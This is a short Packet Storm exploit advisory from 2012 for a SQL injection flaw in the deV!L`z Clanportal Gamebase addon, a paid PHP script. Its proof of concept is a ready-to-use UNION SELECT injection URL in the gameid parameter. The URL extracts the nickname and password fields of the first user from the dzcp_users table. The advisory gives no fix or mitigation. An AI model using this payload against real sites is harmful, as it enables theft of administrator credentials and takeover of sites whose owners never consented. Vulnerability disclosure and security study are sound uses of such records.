deV!L`z Clanportal Gamebase SQL Injection

2012-01-18T00:00:00
ID PACKETSTORM:108791
Type packetstorm
Reporter Easy Laster
Modified 2012-01-18T00:00:00

Description

                                        
                                            `========================================================================================   
| # Title : deV!L`z Clanportal Gamebase Addon SQL Injection Vulnerability   
| # Author Easy Laster   
| # Download : http://www.modsbar.de/Addons/464/gamebase-addon/  
| # Script : deV!L`z Clanportal Gamebase Addon   
| # Price : 20€  
| # Bug : SQL Injection   
| # Date : 05.01.2012  
| # Language : PHP  
| # Status : vulnerable/Non-Public  
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah   
====================== Proof of Concept =================================  
[+] Vulnerability  
  
gamebase/?action=detail&gameid=  
  
[+] Injectable  
  
http://[host]/[path]/gamebase/?action=detail&gameid=1+union+select+1,2,3,4,5,nick,  
pwd,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+dzcp_users+where+id=1--+  
  
`